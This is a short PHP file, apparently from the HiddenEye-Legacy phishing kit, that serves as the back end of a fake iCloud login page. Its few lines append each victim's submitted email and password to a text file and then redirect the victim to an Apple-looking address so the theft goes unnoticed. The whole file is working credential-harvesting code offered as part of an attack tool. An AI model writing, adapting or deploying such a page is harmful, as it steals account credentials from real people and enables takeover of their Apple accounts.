HiddenEye-Legacy/WebPages/iCloud/login.php

7 lines
213 B
PHP
Raw Normal View History

2018-07-12 19:58:13 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['username'] . " [PASS]: " . $_POST['password'] . "\n", FILE_APPEND);
2018-07-13 20:02:59 +08:00
header('Location: http://icloud.cdn-apple.com');
2018-07-12 19:58:13 +08:00
exit();